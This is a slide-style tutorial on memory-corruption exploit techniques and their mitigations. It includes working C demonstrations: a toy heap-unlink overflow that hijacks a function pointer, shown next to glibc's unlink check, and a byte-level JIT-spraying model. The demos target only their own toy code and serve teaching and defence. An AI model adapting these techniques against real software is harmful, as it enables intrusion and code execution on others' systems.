exploit techniques and mitigation
TRANSCRIPT
What is an Exploit?
• A piece of software that leverages an application vulnerability to cause unintended application behavior.
Exploit Techniques
• Stack overflow
• SEH frame overwrite
• Heap overflow
• Ret2LibC
• Return Oriented Programming
• JIT Spraying
• Bypass the Sandbox Model
Heap overflow
• Overwrite the free-list (linked list) pointers stored in the header of the chunk adjacent to the overflowed buffer.
• When the allocator unlinks that chunk, the forged pointers are written back into each other (a write-what-where), which is used to overwrite a function pointer or return address and so the program counter.
Ret2LibC
• Change the return address on the stack to a known function in a shared library (e.g. system() in libc).
• Doesn't require shellcode: existing library code does the work, so a non-executable stack does not stop it.
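The heap overflow slide above describes the classic unlink attack in two bullets. Below is an added toy example in C, not from the original slides, that models it end to end: a chunk layout in which the next chunk's free-list links sit directly after this chunk's user data, an unchecked memcpy that overwrites those links, the dlmalloc-style unlink that turns them into an arbitrary write, and a dispatch through the hijacked pointer. The allocator, the `handlers` struct, the function names and the attacker input are all invented for illustration; real allocators differ. The same block shows the mitigation glibc adopted (the "corrupted double-linked list" consistency check), which rejects the forged links. Addresses are known to the attacker only because this toy has no ASLR.

```c
/* Added toy example: classic unsafe heap unlink (not from the original slides).
 * Chunk layout, handlers struct and names are invented for illustration. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define USER_SIZE 16

/* Toy chunk: free-list links live in the header, and the header of the next
 * chunk sits directly after this chunk's user data (as in classic dlmalloc). */
struct chunk {
    struct chunk *fd;              /* forward link in the free list */
    struct chunk *bk;              /* backward link in the free list */
    unsigned char data[USER_SIZE]; /* user data returned by malloc() */
};

/* Program state reached through a pointer: the attacker's target. */
struct handlers { void *ctx; void (*on_event)(void); };

static int last_event;
static void legit_event(void) { last_event = 1; }
static void evil_event(void)  { last_event = 0x41; }

static struct handlers legit = { NULL, legit_event };
static struct handlers evil  = { NULL, evil_event };   /* attacker-controlled writable memory */
static struct handlers *volatile active = &legit;

static struct chunk arena[2];        /* arena[1] follows arena[0].data with no gap */
static struct chunk freelist_head;   /* sentinel node of the free list */

/* Unsafe unlink from dlmalloc/early glibc: trusts fd and bk blindly. */
static void __attribute__((noinline)) unsafe_unlink(struct chunk *p) {
    struct chunk *fd = p->fd, *bk = p->bk;
    fd->bk = bk;   /* write-what-where: stores bk at fd + offsetof(struct chunk, bk) */
    bk->fd = fd;   /* reflexive write: clobbers 8 bytes at bk + offsetof(struct chunk, fd) */
}

/* Hardened unlink: glibc's "corrupted double-linked list" check. */
static int __attribute__((noinline)) safe_unlink(struct chunk *p) {
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return -1;                     /* refuse to unlink a chunk with forged links */
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}

/* Vulnerable program: copies len bytes into a 16-byte chunk, then the allocator
 * unlinks the neighbouring free chunk and the program dispatches an event.
 * Returns last_event, or -1 if the safe unlink rejected the chunk. */
int heap_overflow_demo(const unsigned char *input, size_t len, int use_safe_unlink) {
    last_event = 0;
    active = &legit;
    evil.ctx = NULL;
    memset(arena, 0, sizeof arena);
    freelist_head.fd = freelist_head.bk = &arena[1];
    arena[1].fd = arena[1].bk = &freelist_head;   /* arena[1] is a free chunk */

    unsigned char *user = arena[0].data;
    memcpy(user, input, len);   /* BUG: no bounds check; len > 16 overwrites arena[1].fd/bk */

    if (use_safe_unlink) {
        if (safe_unlink(&arena[1]) != 0)
            return -1;
    } else {
        unsafe_unlink(&arena[1]);
    }
    active->on_event();         /* dispatch through the (possibly hijacked) pointer */
    return last_event;
}

/* Attacker input: 16 bytes of filler, then forged fd/bk so that fd->bk = bk
 * writes &evil over `active`. The reflexive write lands in evil.ctx, which the
 * attacker does not care about. */
size_t craft_overflow(unsigned char *out) {
    memset(out, 'A', USER_SIZE);
    uintptr_t fake_fd = (uintptr_t)&active - offsetof(struct chunk, bk); /* fd->bk aliases `active` */
    uintptr_t fake_bk = (uintptr_t)&evil;                                 /* value stored into `active` */
    memcpy(out + USER_SIZE, &fake_fd, sizeof fake_fd);
    memcpy(out + USER_SIZE + sizeof fake_fd, &fake_bk, sizeof fake_bk);
    return USER_SIZE + 2 * sizeof(uintptr_t);
}

/* Runs one scenario: benign or overflowing input, unsafe or checked unlink. */
int demo_result(int overflow, int use_safe_unlink) {
    unsigned char input[64] = "hello";   /* constructed benign input, fits in the chunk */
    size_t len = sizeof "hello";
    if (overflow) len = craft_overflow(input);
    return heap_overflow_demo(input, len, use_safe_unlink);
}

int main(void) {
    printf("benign input, unsafe unlink  -> last_event = %d\n",   demo_result(0, 0));
    printf("overflow,     unsafe unlink  -> last_event = 0x%x\n", demo_result(1, 0));
    printf("overflow,     safe unlink    -> rc = %d\n",           demo_result(1, 1));
    return 0;
}
```

With the unchecked unlink the overflow redirects `active->on_event()` to `evil_event`; with the consistency check the forged links are detected before any write happens. The check is cheap because the two loads it needs are the same ones the unlink performs anyway, which is why it has been in glibc for nearly two decades.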
Return Oriented Programming
• Form gadgets by combining short instruction sequences that already exist in the binary or its libraries, each ending in a return instruction.
• A chain of gadgets performs a high-level action, e.g. calling VirtualAlloc() or SetProcessDEPPolicy() to make shellcode executable under DEP.
JIT Spraying
• Makes use of the fact that the JIT compiler generates executable code at runtime.
• Spray NOP sleds and long XOR chains whose constants encode the shellcode, so the JIT fills memory with attacker-chosen executable bytes that a hijacked jump can land on.
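The JIT spraying bullets above are easier to follow with a byte-level picture. The following is an added example in C, not from the original slides, that models the x86-32 code a JIT emits for a long XOR chain (`mov eax, imm32` followed by `xor eax, imm32` for each further term) and shows why execution that lands one byte into the first immediate stays in sync: every immediate's top byte is 0x3C, so the pair 3C 35 decodes as the harmless two-byte instruction `cmp al, 0x35` and swallows the next XOR opcode. Nothing here is executed; the code only builds and decodes the byte stream. The opcode encodings are real x86, and the 0x3C hinge is the trick Dion Blazakis published against the ActionScript JIT in 2010; the packing and decoding functions and the sample payload are constructed for this example.

```c
/* Added example: JIT-spraying byte layout on x86-32 (not from the original slides).
 * pack/emit/decode functions and the sample payload are constructed for illustration. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HINGE_BYTE 0x3C   /* top byte of every immediate: 3C 35 = cmp al, 0x35 */

/* Pack attacker bytes into immediates: low 3 bytes payload, high byte 0x3C.
 * The last immediate is padded with 0x90 (nop). Returns the immediate count. */
size_t pack_immediates(const uint8_t *payload, size_t len, uint32_t *imms, size_t max) {
    size_t n = 0;
    for (size_t i = 0; i < len && n < max; i += 3, n++) {
        uint8_t b[3] = {0x90, 0x90, 0x90};
        for (size_t k = 0; k < 3 && i + k < len; k++) b[k] = payload[i + k];
        imms[n] = (uint32_t)HINGE_BYTE << 24 | (uint32_t)b[2] << 16 | (uint32_t)b[1] << 8 | b[0];
    }
    return n;
}

/* What a naive JIT emits for `x = imm0 ^ imm1 ^ ...`:
 * B8 imm32 (mov eax, imm32), then 35 imm32 (xor eax, imm32) per further term.
 * Immediates are little-endian, so the 0x3C hinge byte is the last of each. */
size_t jit_emit_xor_chain(const uint32_t *imms, size_t n, uint8_t *out) {
    size_t pos = 0;
    for (size_t i = 0; i < n; i++) {
        out[pos++] = (i == 0) ? 0xB8 : 0x35;
        out[pos++] = (uint8_t)(imms[i] & 0xFF);
        out[pos++] = (uint8_t)((imms[i] >> 8) & 0xFF);
        out[pos++] = (uint8_t)((imms[i] >> 16) & 0xFF);
        out[pos++] = (uint8_t)((imms[i] >> 24) & 0xFF);
    }
    return pos;
}

/* Model of what the CPU would execute if control landed at offset 1, inside
 * the first immediate: 3 payload bytes, then 3C 35 (cmp al, 0x35) eating the
 * next XOR opcode, then 3 more payload bytes, and so on. Returns the payload
 * length, or -1 if a hinge pair is missing (the stream would desynchronize). */
long decode_at_offset_1(const uint8_t *code, size_t len, uint8_t *payload) {
    size_t pos = 1, n = 0;
    while (pos + 3 <= len) {
        memcpy(payload + n, code + pos, 3);
        n += 3;
        pos += 3;
        if (pos + 2 > len) break;   /* last immediate: only its hinge byte remains */
        if (code[pos] != HINGE_BYTE || code[pos + 1] != 0x35)
            return -1;
        pos += 2;
    }
    return (long)n;
}

/* Constructed sample payload: 3-byte nop sled, then `xor eax,eax; int3`. */
static const uint8_t sample_payload[] = {0x90, 0x90, 0x90, 0x31, 0xC0, 0xCC};

/* Pack, emit as a JIT would, decode at offset 1; 1 if the payload survives intact. */
int spray_roundtrip(void) {
    uint32_t imms[8]; uint8_t code[64], recovered[64];
    size_t n = pack_immediates(sample_payload, sizeof sample_payload, imms, 8);
    size_t clen = jit_emit_xor_chain(imms, n, code);
    long plen = decode_at_offset_1(code, clen, recovered);
    if (plen != (long)sizeof sample_payload) return 0;
    return memcmp(recovered, sample_payload, sizeof sample_payload) == 0;
}

/* First immediate for the sample: the nop sled under the 0x3C hinge. */
uint32_t first_immediate(void) {
    uint32_t imm; pack_immediates(sample_payload, 3, &imm, 1); return imm;
}

/* Same chain built from ordinary constants (no hinge): decoding desynchronizes. */
long decode_plain_constants(void) {
    uint32_t imms[2] = {0x41414141u, 0x42424242u}; uint8_t code[16], out[16];
    size_t clen = jit_emit_xor_chain(imms, 2, code);
    return decode_at_offset_1(code, clen, out);
}

int main(void) {
    printf("roundtrip ok: %d, first imm: 0x%08X, plain constants: %ld\n",
           spray_roundtrip(), first_immediate(), decode_plain_constants());
    return 0;
}
```

Each immediate carries only three payload bytes, which is why real sprays are long and why the sprayed region is mostly NOP sled: the attacker needs a jump anywhere into megabytes of such code to reach the shellcode at the end of a chain. The negative case shows the dependence on the hinge byte; a JIT that emitted the constants unmodified, or any stream where 3C 35 does not follow each immediate, breaks the instruction stream at offset 1.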
Bypass the Sandbox Model
• Bypass the security mechanism that confines the application.
• Gives an untrusted application access to the underlying system resources.
Address Space Layout Randomization
• A mitigation: randomly arranges the position of key data areas (heap, stack, executable, library space) at each run, so an exploit can't rely on fixed addresses for return addresses, gadgets or sprayed memory.
Malware Protection Solutions
• Anti-Virus: blacklist of file signatures.
  • Only effective against known threats.
• Whitelisting and Sandboxing solutions
  • Hard to implement
  • Require constant maintenance
• Stateful application control
  • Automated malware protection
  • Protects from zero-day attacks